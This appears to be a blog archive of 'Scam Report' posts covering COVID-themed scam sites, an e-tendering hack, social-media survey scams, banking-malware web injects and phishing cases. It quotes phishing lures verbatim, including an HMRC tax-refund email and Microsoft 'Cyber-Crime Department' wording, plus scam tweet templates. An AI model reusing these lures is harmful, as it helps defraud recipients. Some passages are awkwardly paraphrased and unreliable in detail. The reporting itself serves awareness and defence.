Search This Blog

Showing posts with label Scam Report. Show all posts

Russians began to click on scam sites 10 times more often

According to the study of Kaspersky Lab, at the beginning of 2020, the number of attacks on Russians through scam resources increased 10 times to 15 million, and the number of such pages doubled to 10 thousand. The rapid increase is associated with the spread of the coronavirus. Fraudsters actively exploit the theme of the pandemic: from fake promises to pay benefits or refunds for a small cash contribution to the sale of personal protective equipment.

If every click to a scam page entailed deception of at least one user, then the potential amount of damage in the first quarter of 2020 could exceed 3 billion rubles ($40,5 million). Experts did not say how much money the Russians lost on scam resources during this period.

Senior content analyst at Kaspersky Lab Tatyana Sidorina believes that the popularity of scam resources has increased, as Russians have begun to spend more time at home, on the Internet. In addition, users are offered various big money compensations, for the withdrawal of which they need to pay a small commission.

She stressed that the scam resources disguised as state lotteries began to be actively used at the beginning of 2020, 219 resources were discovered. Kaspersky Lab noted that last year, separate statistics on lotteries were not even kept.

In order to minimize the damage from fraud, the Stoloto state lottery is already actively cooperating with law enforcement agencies and conducting an information campaign, said Varvara Basanovich, the organization's operating Director. She stressed that it is impossible to win the lottery without buying a ticket, and the tax is paid after receiving the money, and not in advance.

The head of Analytics and Special Projects at InfoWatch, Andrey Arsentiev, expects that after exiting the self-isolation regime, mass frauds with tourist trips to Russian resorts can start, as well as sellers of drugs for restoring strength, immunity and mental health can become active.

IT Firm’s Directors Arrested In A Rs 3,000 Crore E-Tendering Scam

Officials of Osmo IT Solutions were arrested by the economic offenses wing (EOW) on Thursday; just a day after a FIR was lodged in the Rs 3,000-crore e-tendering case.

The police have arrested the firm's director's Vinay Choudhary and Varun Chaturvedi, along with the marketing head Sunil Golwalkar according to the EOW superintendent of police (Bhopal), Arun Mishra.

The case identifies with how a few firms purportedly illicitly figured out how to hack the e-procurement portal to see the e-tenders before the offer was to be opened and after that roll out the favourable changes in the bid.

Indeed, even after the inquiry was going on in the workplaces of Osmo in Man Sarovar Complex, Bhopal, Mishra said that the computer emergency response team report had called attention to altering in the e-tendering that had been done in the Osmo office.

 “They are in our custody and we are questioning them. We have also seized hard disks and analyzing the server data of the company,” he adds later.

EOW authorities said that in 2016, OSMO IT Solutions had been asked to organize a performance testing on for what reason the e-procurement portal was working so slowly. For that reason a "Demo department" was created in mid-2016 for preparing and practice for the department authorities and bidders.

Later when the scam broke, an internal inquiry by Madhya Pradesh state economic development corporation (MPSEDC), who facilitated the e-tendering portal, found that the user ID given to OSMO (PT_4) was utilized more than once to get to the e-procurement portal to change the 'tender document' and the CERT report checked that the progressions had been produced using the offices of OSMO.

 “We are contacting all the departments and taking data from MPSEDC. So far we had been investigating only nine tenders from five departments, but since we are sure that a crime has been committed, it is logical that we expand the ambit of our investigations and include all e-tenders floated so far,” said the officials.

In the FIR lodged yesterday, the cases had been enrolled against five departments and eight companies, which included OSMO IT Solutions.

Facebook's 'Dislike Button' scam

Few days after Facebook CEO Mark Zuckerberg, on September 2015, in a Q&A session announced that the long awaited Facebook ‘Dislike Button’ will be implemented soon, scammers seized upon this opportunity in spreading phishing attacks and malware.

Soon after this, many users got the link inviting them to download the Facebook’s ‘ Dislike Button’, it says that it is "invite-only feature". One of the most popular dislike button scam is titled as “Get newly introduced Facebook dislike button on your profile". Once clicking on these links leads the victims to a malicious websites.

The ultimate goal of the scammer  is to encourage users to share the link on their Facebook page. Once it is  spread on Facebook, they asks you for your personal information and account credentials, or sometimes it  downloads the malicious software causing further damage to the computer.

Zuckerberg,  the co-founder and CEO said that, "We are working on it, and are very close to shipping a test of it."

Computer security expert Graham Cluley  showed this concern over this on his blog.  "Scams like this trick you into liking pages, and sharing the link with your friends, using the bait of something some cases they will even lead you to pricey premium rate mobile phone subscriptions, online surveys that generate the scammers income, or trick you into downloading malicious code onto your PC."

And advised that, "Don't be duped. If you're a Facebook crack-addict then try to resist the urge of falling for the latest scam, and wait for Facebook to properly roll-out new features as and when they choose."

Beware of Sites Claiming to House “Gifts for My Subs"

Researcher at MalwareBytes posted in a blog revealing that the online services like Steam, Amazon, iTunes, Skype, and Netflix provide opportunities to hack Facebook accounts and increase Instagram followers.

The researcher said that during their scam survey they picked any of the 10+ options offered results. Some of these choices direct users to a different domain or require more info (usually an email address) or specify certain values from the user as part of the ploy, like how many diamonds would he/she want to be added to their game or how many followers he/she wants to gain.

“The amount of hoop-jumping these scammers want users to do is expected, but remember that the end result is the same: users don’t get what was promised to them. We also found other sites similar to searchcheat[DOT]com, which we implore you, dear Reader, to avoid visiting and sharing,” the researcher added.

They are as follows:
Under the IP address, 192[DOT]95[DOT]42[DOT]205
allsgamino[DOT]info (VT score)
deluxecheat[DOT]com (VT score)
gurucheats[DOT]com (VT score)
pew-gifts[DOT]info – redirects to gurucheats[DOT]com
cardsfree[DOT]net (VT score)
ssundee[DOT]info – redirects to gurucheats[DOT]com
cardsfree[DOT]co (VT score)
freecodes[DOT]co (VT score)
rarecheats[DOT]com – redirects to cardsfree[DOT]net
Under the IP address, 37[DOT]46[DOT]124[DOT]84
giftsforsubs[DOT]com (VT score)
Under the IP address, 79[DOT]96[DOT]145[DOT]251
giftsforsubscribers[DOT]com (VT score)

“It shouldn’t come as a surprise to video subscribers and fans, especially those numbering by the hundreds of thousands, to be targeted and nudged to click generally dodgy links. After all, scammers are also drawn to large crowds because that’s where the money is. That said, users must exercise utmost caution when dealing with links on comments and on profiles,” she said.

The researcher suggested that it was important for Internet personalities to be constantly communicate with their followers regarding fishy links and other potentially harmful content that were posted publicly by shady characters to their channels. Taking their cue from JackSepticEye may be a good place to start.

British lady lost £50,000 in a “phishing scam”

Beware of doing any Online transaction as a lady from London has claimed that she lost £50,000, her life savings in a “phishing scam”.

According to a report published on BBC, the 59-yeat-old Vivian Gabb told in the Victoria Derbyshire’s, a British journalist and a broadcaster, was in the middle of buying a house when her email got hacked by the crooks.

She said that she was conned out of her life savings by scammers who sent her a 'phishing' email with instructions to wire the money to the “bank”.

She was unaware that every email she wrote and received was being monitored by criminals.

According to her, the criminals sent her a message disguised as a follow-up email from her solicitor and asked her to deposit nearly £50,000 into their account.

According to the news report, the Get Safe Online,  an internet safety advice website, says more than half (51%) of people in the UK have been a victim of an online crime, and 15% of people have been victims of either attempted or successful hacks of their email account.

Cyber criminals convicted of stealing more than £1 million using Fake job ads

Organized criminal network of five men and one woman have been convicted for stealing more than £1million from job hunters using fake job advertisements.

The members of the criminal are Adjibola Akinlabi (aged 26), Damilare Oduwole (26), Michael Awosile (27), Nadine Windley (26) and Temitope Araoye (29) and a malware writer "Tyrone Ellis (27)".

The evidence gathered by authorities including phone and online chat records shows that they made more than £300,000 from their fraud scheme. However, the officers believe it could be much higher , possibly more than £1million ($1.6m).

According to the National Crime Agency report, the fraudsters targeted innocent job hunters with fake job ads. Those who responded to the ads were sent a link via email asking them to complete an application form. Once the user clicks the link , it inadvertently install malware in victim's system.

The malware is capable of recording keystrokes and capturing victim's financial and personal data.

The compromised information is used by the fraudsters to get a new credit and debit cards, pin numbers.

The crooks will remain in custody and expected to be sentenced on Thursday 14 November.

Victim fell prey to 'phishing' scam and lost £1 Million to fraudsters

This is another incident that reveals why you should be careful on the Internet. A British woman fell prey to a phishing scam and lost her £1million life savings.

The victim unwittingly handed over her personal details to fraudsters after receiving a bogus bank notification email.

Tamer Abdelhamid, the fraudster who stole the personal data then sold the info to Nigerian national, Rilwan Oshodi.  A 26 year old woman from Sierra Leone used the data to change the bank details by pretending to be the victim.

Detectives seized Oshodi's computer during a raid on his home with details of more than 11,000 credit cards, according to DailyMail report.

The fraudsters purchased cheeseburgers, high-end computers, gold with the stolen money. They are facing jail for their roles in the scam.

Beware spam emails seeking donations for victims of Hurricane Sandy disaster

sandy scams

While lot of people suffers severe damage from Superstorm Sandy, there are some groups that ready to take advantage of this natural disaster to push their crap.

Symantec has observed a spam mails related to the hurricane flowing into their Probe Networks.

The spam mails with the subject 'Help Sandy Victims and get $1000 for Best Buy!' , 'Sandy Strikes... [WARNING]' and ' Deposit Processing Open Today (Frankenstorm doesn't stop us)' targets the disaster.

Taking advantage of the natural disasters is not new for spammers.  In the past, they've taken advantage of Haiti earthquake, Japanese earthquake and tsunami disaster.

Symantec researchers anticipates the following types of scams in the next few days : fake news, donation requests, 419 scams ,phishing and malicious video link attacks .

We anticipate there will be Facebook video scam attack, twitter mentioning scams.

Symantec said internet users should reach out to storm victims through legitimate and secure channels, rather than donating money or buying products through wire transfer services or other untraceable methods of payment.

Facebook Clickjacking spam : "She is 17-years-old, she did it publicly in high school while drunk"

facebook scam

Facebook scams with image of attractive girls while doing various things are not new one.  The Hoax-slayer has come across another one that leads to like jack attack and lure users into completing surveys for watching videos.

"[STUNNING!!] She is 17-years-old, she did it publicly in high school while drunk, really stunning!" The title of the scam post reads.

When a user click the link, it will open a fake video webpage. If a user click the play button  on the bogus video actually, it "likes" the scam post and displays it on your Facebook profile.

Then it will open another page where users are asked to complete survey in order to verify your age before viewing the video.

Once a victim completes the survey , they are requested to provide their mobile phone number, the information being utilized to sign them up for paid SMS services.

Spam Tweets : "My aunt joined and is making 2k a week in less then 3 months."

If you are searching for the easy way to make money, beware of spam tweet that mention your name in the Tweets.

Today, In the 'Interactions' tab , i got notification that one user mentioned me in his tweet.

"My aunt joined @EasyMoney*** and is making 2k a week in less then 3 months. Can I join too? @BreakTheSec" The Tweet reads.  Oh, you want my suggestion?! You made a mistake by mentioning my name in the tweet.

In the the twitter account 'EasyMoney***' , the tagline is written as "Helping others generate online income for the past year. I offer 100% free training and can get you making $1,000 a week in just a month for FREE! [LINK] "

"Don't be fooled by some work at home system that costs money to start. 99% of those are scams. Try mine it is free no hidden fees at all" One of the spam tweet that made me to laugh. Oh, really?!
The link provided in his tweet redirects to multiple sites and finally lands me in the legitimate flipkart site. @MalwareMustDie has confirmed that it is spam clicker, it will make money for the spammers.

There are plenty of fake twitter account post the same tweet and mentioning twitter user name at the end of Tweet. I've pasted the list of fake twitter accounts that involved in this campaign.

I used website called "twitwheel" to find out reach of scammer twitter account.(for the first time, i am using this site).  Lot of users has responded to this tweet by questioning "is this real , virus" and more tweets.  Few legitimate users also re-tweet without realizing the truth.

At the time of writing, i have discovered another variant of this spam tweet.

Hi @QuickBuck** thanks to you im in my 47th day and have made over $6k. Can my friend join?

Fortunately, the main accounts of spammer has been suspended by Twitter (Thank you twitter).

* Update : *
The New variant of spam tweet:

So @Paul38658587 can I still signup? My brother joined and is making great money @VictimAccount

Another interesting find:
Today, i analyzed the new variant of this spam campaign and discovered something interesting.  The main spammer account retweet some posts from Twitter users.

Now, i analyzed those twitter account also ; They have around 100 followers and posted some legitimate-looking tweets. But If you compare the latest tweet and past tweets , you will find the truth. The similarity among those accounts is that their previous legitimate-looking tweets is on Jul 5 or 6.

Obviously, Those followers in these fake accounts are also fake. I believe there will be thousands accounts involved in this campaign.

Another interesting find is that the main spammer account always use "Paul" as name.

*Update 2* :
Im joining now @Paul32518314 because my cousin is a member and is making 4k a month in less then 2 months

Microsoft Cyber-Crime Department Phishing Scam

A spam mail purporting to be from the Microsoft Cyber-Crime Department claims that all email users around the world are required to validate their account by clicking a link in the message or risk having their email address deleted from the world email server.

“As part of the security measures to secure all email users across the world, All email users are mandated to have their account details registered as requested by the Microsoft Cyber-crime Dept ( M C D ),” part of the email reads.

“You are here by required to validate your account within 24 hours so as not to have your email account suspended and deleted from the world email server. Kindly validate your email account to have your account registered, follow d link below: [Link],” it continues.

To make it more legitimate-looking, the logo of Microsoft’s Digital Crime Unit has been embedded into the notification.

When users click on the link, they’re taken to a bogus website that’s designed to collect sensitive information and send it back to the attackers, Hoax Slayer reports.

Facebook virus: Citadel targets Facebook Users with Children’s Charity Scam

Security researchers from Trusteer , have discovered a new variant of the Citadel malware that injects itself into your Facebook webpages and demands that you make a donation to a fake charity for sick children.

After users have logged into their Facebook account, the Citadel injection mechanism displays a pop up that encourages the victim to donate $1 to children who “desperately” need humanitarian aid.Next, it asks you for your name, credit card number, expiration date, CVV, and security password.

What makes this attack particularly sophisticated is the malware configured to deliver the attack based on the user's country/language settings, with web-injection pages in five different languages: English, Italian, Spanish, German and Dutch.

In an interesting twist, the criminals do not reuse the same text for every language. Instead, they have customized each attack based on the victim’s country and/or region.

"This attack illustrates the continuing customization of financial malware and harvesting of credit card data from the global base of Facebook users. Using children’s charities as a scam makes this attack believable and effective," a Trusteer spokesperson wrote.

"Meanwhile, the one dollar donation amount is low enough that virtually anyone can contribute if they choose. This is a well-designed method for stealing credit and debit card data on a massive scale."

fake Facebook photo tag notification leads to BlackHole Exploit page

Legitimate-looking emails that tell users they’ve been tagged in a picture on Facebook have been found to serve in a malicious campaign designed to spread a nasty Trojan. The email has been intercepted by Sophos Labs.

Apparently originating from (with three “o”s), the notifications tell the recipients that a member of the social media site has added a photo of them, Sophos experts report.

Once user click the link provided in the email , he will be taken to a website that hosts BlackHole Exploit kit.

To avoid raising any suspicion, within four seconds your browser is taken via a META redirect to the Facebook page of a presumably entirely innocent individual.

In background, BlackHole Exploit kit take advantage of the vulnerabilities resides in the user system and drops a malware file onto the victim’s computer.

Bogus Facebook apps redirects you to a random Android app

Bogus Facebook apps redirects mobile traffic towards android apps , warns Bitdefender Security researchers. Cybercriminals developed fake version of two legitimate apps “Lista de Verificación del Amante Ideal” and “Lista de Verificare pentru Iubit(a)”(that’s Spanish and Romanian for “Girlfriend Checklist”).  The fake version promotes Android games.

The legitimate version of this app are supposed to scan your Facebook contacts and list all the potential girlfriends/boyfriends among your friends. It also enables tagging so “potential candidates” can be made aware of the (fake) app you’ve used.

These fake applications have the same behavior as their original counterparts (in terms of functionality), but they perform a http 302 redirect to another link, that’s not Facebook-related, when they detect mobile traffic.

The fake version will redirect you to a random Google Play game , if you are from Android handset.

"None of the analyzed Google Play apps have proven to be infected with malware, but the possibility of being redirected to some potentially malicious application or website should not be taken lightly." says researcher.

"This could be the beginning of paid promotions through Facebook, where Android app developers can actually subscribe to have their apps promoted via Facebook by means of illegitimate services. This type of paid advertisement of Android apps through Facebook is a new concept and although these redirecting links/apps are not malicious so far, they could turn out to be at some point."

P2P Zeus Variant targets Facebook,Google & Yahoo users

Trusteer researchers have discovered a peer-to-peer (P2P) variant of the Zeus platform that targets users of Google, Yahoo, Hotmail, Facebook in order to steal their credit card data.

The scams exploit the trust relationship between users and these well-known service providers, as well as the Visa and MasterCard brands.

When targeting the facebook users, the attackers use a web inject to present the victim with a fraudulent 20% cash back offer by linking their Visa or MasterCard debit card to their Facebook account. The scam claims that after registering their card information, the victim will earn cash back when they purchase Facebook points. The fake web form prompts the victim to enter their debit card number, expiration date, security code, and PIN.

The attacks against Google Mail, Hotmail and Yahoo users, Zeus offers an allegedly new way of authenticating to the 3D Secure service offered by the Verified by Visa and MasterCard SecureCode programs.

The scam that targets Google Mail and Yahoo users claims that by linking their debit card to their web mail accounts all future 3D Secure authentication will be performed through Google Checkout and Yahoo Checkout respectively. The fraudsters allege that by participating in the program the victim’s debit card account will be protected from fraud in the future. The victim is prompted to enter their debit card number, expiration date, security code, and PIN.

The Hotmail scheme is somewhat similar, the potential victims being informed of the fact that “Windows Live Inc” is concerned about their security, offering a “100% secure, fast and easy” method of preventing fraud by linking the account to the debit card.

This attack is a clever example of how fraudsters are using trusted brands – social network/email service providers and debit card providers – to get victim’s to put down their guard and surrender their debit card information.

These webinjects are well crafted both from a visual and content perspective, making it difficult to identify them as a fraud. It’s also ironic how in the Google Mail, Hotmail and Yahoo scams, the fraudsters are using the fear of the very cybercrime they are committing to prey on their victims.

"Draw Something" scam targets Twitter users

Sophos Security Researchers spotted a number of Twitter accounts that is spamming users telling them that they have won a prize. After analyzing the accounts, researchers found that it targets Twitter users who have mentioned "Draw Something" in past tweets.

'Draw Something' is currently storming the online gaming scene with with hundreds of millions of downloads onto iPhone and Android smartphones ! In this game you're put into a room with other players and must then draw or doodle an image that will then be shown to another player who has to guess what it is that you've drawn!

The Scam tweet claims it is offering 5000 prizes to lucky 'Draw Something' fans . "You have been chosen! Claim Your Prize[link]" reads one of scam tweets. "You’re a lucky Prize Winner[link]" reads another variant.

Following the link will lead you to a newly-created website called The site says, "Congratulations Draw Something Fan. You’ve Been Randomly Selected! " and ask users to answer a few quick questions about 'Draw Something' in order to win a "FREE Gift worth over $500".

"What you will discover, however, is that you are taken to an all-too-familiar survey scam."Researcher said ."Your chances of ever receiving a prize are remote - chances are that you will either end up handing over personal information, or will be helping the original scammer earn commission".

Sophos reports the account as spam in Twitter. This does not mean that 'Draw something' campaign has been destroyed, spammers always continues their spam attack on innocent users.

New phishing scam targets Italy’s post office

Bitdefender security researcher come across a phishing scam mail that purportedly coming from Italian post operator Poste Italiane. The post office clients has been targeted with this spam mail and asking them to confirm their login data for maintenance reasons.

In order to trick users into believing that mail comes from the legitimate place, attacker added the legitimate menus and banners in their mail.
The fake mail ask recipients to confirm their identification data and provides the user with a link that sends them to a login page that asks for personal information such as user name, password, card ID or security card number.

Once the user submit the information, everything is stored in a plain text file on the same compromised server that hosts the phishing form. If the data is stored in text file, the information is not only not only available to attackers, but also to anyone who knows how to use a search engine to find valid CC info.

"As a rule always avoid giving out credit card information, especially when you need to disclose your PIN or CVV info. Banks and other institutions working with money never ask clients to change IDs or passwords via e-mail. When in doubt, pick up your phone and call or pay them a visit to make sure. Also, install anti-virus software and keep it up to date." Researcher give security Tips.

"Get Free iPad 3 !" Beware of Facebook and Twitter Scams

While everyone anticipating that Apple will announce a new version of its iPad tablet computer in San Francisco on March 7th, Scammers have decided to take advantage .

Sophos security researcher come across a Facebook and Twitter Scam post that claims "Get free iPad 3". The interesting thing, iPad 3 doesn't exist yet.

"As Apple hasn't even announced the existence of an iPad 3, these posts and pages (some of which have existed for months) are clearly up to no good," says Researcher Graham Cluley.

"Chances are that we will see Apple announce an iPad 3 very soon. But don't be duped into believing there's an easy way to get one for free." He added.

McDonald’s Gift Card Spam on Twitter redirects to adult dating site

TrendMicro have spotted a Twitter spam touting “gift cards” at the tail-end of the gift-giving season. These tweets has shortened URL with the strings "#mcdonalds gift card."

McDonald’s is a globally well-known fast food chain that, like many other establishments, do offer certificates and vouchers for patrons who would like to give these as gifts or rewards.

Unfortunately, This is not gift card from McDonald , it is one of Twitter Scam that lands you in Adult Dating site.

TrendMicro consider the URLs used in this attack as malicious because of the deceitful nature by which they are used. The lure “#mcdonald’s gift card” would have definitely led several users to believe that some gift certificates or vouchers are being given away or discounted.

A couple of weeks ago of weeks ago in the US, attention was drawn to a Mystery Santa who donated $500 worth of gift cards from McDonald’s to a nearby homeless shelter. Whether or not cybercriminals got a social engineering idea from this cannot be confirmed, but in all cases users are advised against clicking on links without first inspecting them. In this case, hovering on the link would have given users a clue about how to proceed.

TAX Refund Notification: HMRC phishing scam

"New Spam mail are currently circulating that purport to be sent by the UK tax organization HM Revenue & Customs (HMRC). These e-mails claim that the recipient is eligible to receive a tax refund and that he or she must download an attached file and open it in a browser" report from sophos.

The scam e-mail :


Dear Taxpayer,
After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 223.56 GBP.

Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

If victim open the attachment, it will ask to enter his/her personal information. Ofcourse submitting the form won't actually send the information to HMRC; it will instead be sent to a malicious third party without the victim's knowledge or approval.